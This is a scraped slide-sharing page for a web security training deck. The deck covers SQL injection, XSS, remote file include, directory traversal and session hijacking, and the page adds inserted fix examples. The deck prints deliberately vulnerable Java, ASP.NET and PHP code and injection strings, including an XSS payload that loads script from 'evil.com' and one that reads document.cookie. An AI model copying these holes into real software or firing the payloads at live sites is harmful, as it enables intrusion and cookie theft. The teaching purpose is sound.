BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
 
Hack any website
Hack any websiteHack any website
Hack any website
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 

Semelhante a Fundamental Application and Website Security

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
Pci compliance writing secure code
Pci compliance   writing secure codePci compliance   writing secure code
Pci compliance writing secure codeMiva
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesAlireza Aghamohammadi
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web ApplicationsVladimir Soghoyan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp dotnetcode
 

Semelhante a Fundamental Application and Website Security (20)

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
Pci compliance writing secure code
Pci compliance   writing secure codePci compliance   writing secure code
Pci compliance writing secure code
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilities
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Attques web
Attques webAttques web
Attques web
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web Applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 

Último

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 

Último (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 

Fundamental Application and Website Security

  • 1. Application and Website Security – Fundamental Edition
      Daniel Owens
      IT Security Professional
  • 2. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion And Appendices
  • 3. Purpose
      Drum up interest
      Session Prerequisites
      None
  • 4. Communication Media and Security Concerns
      Communication media:
        'Wired' networks
        'Wireless' networks
      Security concerns:
        The Insider
        The Outsider
        The Technology
        Nature
  • 5. A Note About Security
      Security helps functionality – if it doesn't help functionality, it isn't security.
      -Daniel Owens
  • 6. Consequences of Poor Security
      Stolen intellectual property
      System downtime
      Lost productivity
      Damage to NASA's reputation
      Lost public confidence
      Lost revenue
      Congressional inquiries
  • 7. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion And Appendices
  • 8. SQL | LDAP Injection
      SQL and LDAP Injection
        The injection of malicious code intended to bypass filtering and execute a query of the attacker's choosing
        Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists
      Example strings include:
        1'1
        %31%27%20%4F%52%20%27%31%27%3D%27%31
        &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
        *(|(mail=*))
  • 9. Java SQL Injection
      import java.sql.*;

      static void main(String[] args){
        Connection conn=null;
        String username=args[0];
        String password=args[1];
        // Vulnerable: user input is concatenated straight into the query text
        String query="SELECT uid, pass FROM users WHERE uid LIKE '"+username+"%'";
        conn=DriverManager.getConnection("jdbc:odbc:logistics","admin","LetMeIn");
        Statement stmnt=conn.createStatement();
        ResultSet rs=stmnt.executeQuery(query);
        …
      }
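The same query built both ways, as an added example that is not part of the deck (Python with sqlite3 standing in for the Java/JDBC code; the table, rows and inputs are constructed). The fixed version also escapes LIKE wildcards, a caveat the slide's trailing % makes relevant: even a bound parameter of "%" would otherwise match every row.

```python
import sqlite3

# Constructed sample table, not from the original deck.
USERS = [("alice", "h1"), ("bob", "h2"), ("admin", "h3")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn

def lookup_vulnerable(conn, username):
    # Same construction as the deck's Java: the value is spliced into SQL text,
    # so quotes, comments and wildcards in it are all interpreted by the engine.
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return [row[0] for row in conn.execute(query)]

def lookup_fixed(conn, username):
    # Parameterized statement: the value is bound, never parsed as SQL.
    # LIKE metacharacters are escaped so the input cannot widen the match either.
    escaped = (username.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    query = "SELECT uid, pass FROM users WHERE uid LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(query, (escaped + "%",))]
```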
  • 10. Demonstration 1
      SQL Injection
      Bypassing Security Checks
  • 11. Case Study 1
      SQL Injection
      Owning Networks
  • 12. Cross-Site Scripting (XSS)
      XSS
        The injection of client-side code
        Comes in three kinds:
          Persistent
          Non-Persistent
          DOM
        Only occurs when user input influences the output
        Can be stopped by assuming all input is malicious until proven otherwise through a whitelist
        Can lead to a complete system compromise – for
  • 13. Cross-Site Scripting (cont.)
      XSS (cont.)
      Sample strings:
        <script src=http://evil.com/attack.js << </script <<
        <link rel="stylesheet" href=http://evil.com/attack.css>
        %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E
        <img src="" onMouseOver="alert(document.cookie)"; />
  • 14. ASP.NET Cross-Site Scripting
      <%@ Page Language="C#" ValidateRequest="false" %>
      <html>
      <script runat="server">
        void btnSubmit_Click(Object sender, EventArgs e) {
          Response.Write(txtString.Text);
        }
      </script>
      // CONTINUED ON NEXT SLIDE
  • 15. ASP.NET Cross-Site Scripting (cont.)
      // CONTINUED FROM PREVIOUS SLIDE
      <body>
      <form id="form1" runat="server">
        <asp:TextBox id="txtString" runat="server" Text="<script>alert('hi');</script>" />
        <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" />
      </form>
      </body>
      </html>
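The reflected write from btnSubmit_Click beside two defences the deck names, output encoding and a whitelist, as an added example that is not part of the deck (Python instead of ASP.NET; the whitelist pattern and page fragments are constructed). It also shows why the encoded value must sit inside a quoted attribute, the context the onMouseOver sample on slide 13 abuses.

```python
import html
import re

# Constructed whitelist for a field that should only ever hold a user name.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def render_vulnerable(text):
    # Same behaviour as the deck's Response.Write(txtString.Text): the value
    # is written into the page unchanged, so markup in it becomes markup.
    return "<p>You entered: " + text + "</p>"

def render_fixed(text):
    # Output encoding: <, >, &, " and ' are turned into entities, so the
    # browser shows the text instead of parsing it.
    return "<p>You entered: " + html.escape(text, quote=True) + "</p>"

def render_attribute_fixed(text):
    # Attribute context: encoding alone is not enough if the attribute is
    # unquoted, because a space in the input would start a new attribute.
    return '<input type="text" value="' + html.escape(text, quote=True) + '">'

def accept_username(text):
    # Whitelist: the input is presumed malicious until its shape proves it is
    # not; anything outside the allowed alphabet is rejected, not cleaned.
    return text if USERNAME_RE.fullmatch(text) else None
```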
  • 16. Demonstration 2
      XSS
      Having Fun
  • 17. Remote File Include/Execution | Code Injection
      Remote File Include and Execution
        An attacker tricks the system into including and/or executing arbitrary files
      Code Injection
        An attacker tricks the system into executing arbitrary code by injecting the commands into the code
      Both
        Code of the attacker's choosing is executed
        Contrary to popular belief, ANY language can suffer this
  • 18. PHP Remote File Include
      <?php
      ....
      require_once($_GET['config']);
      require_once($_GET['base']."/index.php");
      ....
      ?>
  • 19. ASP.NET Remote File Include
      <%
      ....
      set url = Request.QueryString
      set xml = Server.CreateObject("Microsoft.XMLHTTP")
      xml.open "GET", url, false
      xml.send ""
      Response.write xml.responseText
      set xml = nothing
      ....
      %>
  • 20. Hidden Elements | Cookies
      Hidden Elements and Cookies
        Hidden fields and cookies were merely intended to provide data storage without cluttering up the user's view
        They do not provide secure storage
        They are not immutable storage locations
        Neither should contain sensitive information
        Both should be considered malicious until proven otherwise
        Data from either should not be used directly for output
        Whitelisting should be used to prove innocence
  • 21. Hidden Elements | Cookies (cont.)
      Hidden Elements and Cookies (cont.)
      &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErrorddOnClickreturnconfirm ... 'USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', 'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
  • 22. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion And Appendices
  • 23. Session Hijacking – Cookie Theft
      Cookie Theft
        The theft of a client's cookies by an attacker
        Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc.
        Can be hampered if mechanisms such as NONCEs are used
        NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information
        Additional mechanisms include using secure cookies, but this has limited impact
  • 24. Session Hijacking – Session Fixation
      Session Fixation
        An attacker uses a 'known' session ID
        Often, the attacker opens the session and keeps it open while attempting to convince a victim to log in using the known session
        This is often a phishing or other social engineering attack
        Can be hampered if session IDs are 'rekeyed' on login AND sessions expire and are removed quickly
        Difficult to stop if sessions are guessable
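The two mitigations from slides 23 and 24 together in one session store, as an added example that is not part of the deck: a session "NONCE" built from the client and server characteristics the slide lists, rekeying on login, and removal on expiry. It is Python with an in-memory store and a caller-supplied clock; the store, field names and sample clients are constructed.

```python
import hashlib
import hmac
import secrets

def fingerprint(client_ip, server_ip, server_port, user_agent):
    # The per-session NONCE from slide 23: a digest of characteristics that
    # should not change for the lifetime of one client's session.
    material = "|".join([client_ip, server_ip, str(server_port), user_agent])
    return hashlib.sha256(material.encode()).hexdigest()

class SessionStore:
    # Constructed in-memory store; "now" is passed in so the example is deterministic.
    def __init__(self, max_age=900):
        self.sessions = {}      # token -> {"user": ..., "fp": ..., "touched": ...}
        self.max_age = max_age

    def create(self, fp, now, user=None):
        # Only server-issued random tokens are ever honoured, so a client
        # cannot pre-set its own session ID (fixation).
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {"user": user, "fp": fp, "touched": now}
        return token

    def login(self, token, user, fp, now):
        # Rekey on login: the pre-login token (possibly attacker-known) is
        # discarded and the authenticated state lives under a fresh token.
        self.sessions.pop(token, None)
        return self.create(fp, now, user=user)

    def user_for(self, token, fp, now):
        s = self.sessions.get(token)
        if s is None:
            return None
        if now - s["touched"] > self.max_age:
            del self.sessions[token]      # expired sessions are removed, not just ignored
            return None
        if not hmac.compare_digest(s["fp"], fp):
            return None                   # cookie presented by a different client
        s["touched"] = now
        return s["user"]
```

Binding to the client IP rejects legitimate users whose address changes mid-session (mobile networks, load-balanced proxies), so deployments that cannot accept that often bind only to the more stable characteristics.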
  • 26. Directory Traversal
      Directory Traversal
        An attacker is able to trick the system into traversing the directory structure
        In many instances, arbitrary files can be viewed
        Attackers are often attempting to execute a file or gather information
        If user input dictates the output, care must be taken to ensure the input is 'valid'
        Whitelists become invaluable
        In extreme cases, an attacker can actually use this to gain administrator access to the server
  • 27. PHP Directory Traversal
      <?php
      ....
      $date=$_GET['date'];
      if($handle=fopen("calendar/$date","rb")){
        print(fread($handle,filesize("calendar/$date")));
        fclose($handle);
      }
      ....
      ?>
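The calendar read from slide 27 beside a hardened version, as an added example that is not part of the deck (Python instead of PHP; the sandbox directory, files and allowlist are constructed). It also covers the include-by-parameter pattern of slides 18 and 19 with the same idea: the client chooses from a fixed table rather than supplying a path.

```python
import os
import re
import tempfile

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")

# Constructed allowlist standing in for $_GET['config']: the client sends a
# short name, and only files in this table can ever be included.
CONFIG_FILES = {"dev": "config/dev.php", "prod": "config/prod.php"}

def make_sandbox():
    # Constructed web root: calendar/ with one entry, plus a file outside it.
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "calendar"))
    with open(os.path.join(root, "calendar", "2024-01-15"), "w") as f:
        f.write("meeting at 10")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db password")
    return root

def read_calendar_vulnerable(root, date):
    # Same shape as the deck's PHP: the parameter is concatenated onto the path,
    # so ".." segments walk out of calendar/.
    with open(root + "/calendar/" + date, "rb") as f:
        return f.read().decode()

def read_calendar_fixed(root, date):
    # Whitelist first: only values of the expected shape are considered at all.
    if not DATE_RE.fullmatch(date):
        return None
    base = os.path.realpath(os.path.join(root, "calendar"))
    target = os.path.realpath(os.path.join(base, date))
    # Containment check: after resolving symlinks and "..", the target must
    # still sit below the base directory.
    if os.path.commonpath([base, target]) != base:
        return None
    with open(target, "rb") as f:
        return f.read().decode()

def resolve_config(name):
    # Table lookup: no user-supplied path or URL ever reaches the include.
    return CONFIG_FILES.get(name)
```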
  • 28. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion And Appendices
  • 29. Session Hijacking – Spoofing
      Spoofing
        Pretending to be someone else, an attacker attempts to gain the victim's privileges
        Comes in three basic forms:
          Blind (write-only)
          Half pipe (read-only)
          Full pipe
        Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
  • 31. Case Study 2
      Session Hijacking
      Spoofing
  • 32. Weak Encryption | Using Encoding
      Weak/Home-Grown Encryption
        The use of weak and home-grown encryption has led to the compromise of many systems
        It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks, so trivial
      Encoding
        The use of algorithms that take output and simply change the format (normally it is the number of bits used per character)
        This is not secure by any means
  • 33. Case Study 3
      Weak Encryption | Encoding
        XOR
        SHA
        Base64
  • 34. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion and Appendices
  • 35. Security Compass
      XSS-Me
        A free Firefox plug-in
        Performs semi-automated XSS attacks against POST fields
      SQL Inject-Me
        A free Firefox plug-in
        Performs semi-automated SQL injection attacks against POST fields
      Access-Me
        A free Firefox plug-in…
  • 36. Other Firefox Add-ons
      Web Developer Add-on
        Free
        Lets you view source files cleanly and easily
        Lets you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)
        Lets you view and modify form fields and cookie data
      Tamper Data
        Free
        Lets you modify most request data
  • 37. Fuzzers
      BED.pl
        Free Perl script
        Performs basic tests of your SERVER
      JBroFuzz
        Free Java application
        Lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion
      Powerfuzzer
        Free and commercial versions (Python script)
        Easy and multi-talented… automated
  • 38. Other Tools
      Sothink SWF Decompiler
        Decompiles any Adobe Flash or Flux script
      Cavaj
        Free
        Decompiles any Java program
      Nikto
        Free
        Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
  • 39. Agenda
      Course Introduction
      Common Input Validation Flaws
      Common Access Control Flaws
      Common Encryption Flaws
      Tools
      Conclusion And Appendices
  • 40. For More Information
      Microsoft Security Site (all audiences)
        http://www.microsoft.com/security
      MSDN Security Site (developers)
        http://msdn.microsoft.com/security
      TechNet Security Site (IT professionals)
        http://www.microsoft.com/technet/security
      SANS Top-20 (IT Professionals)
        http://www.sans.org/top20/
  • 41. For More Information (cont.)
      Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers)
        http://cwe.mitre.org/top25/index.html
      GRC IT Security Office
        http://itsecurity.grc.nasa.gov
      Most Common Software Errors
        http://discussweb.com/software-testing/803-most-common-software-errors.html
  • 42. Acknowledgements
      I stole the background from Microsoft
      I stole a lot from my experiences and previous writings

Editor's Notes

  1. The above code illustrates a SQL injection vulnerability
  2. The code here is vulnerable to XSS
  3. The code here is vulnerable to remote include in two locations
  4. The code here is vulnerable to a remote include
  5. The code here is vulnerable to directory traversal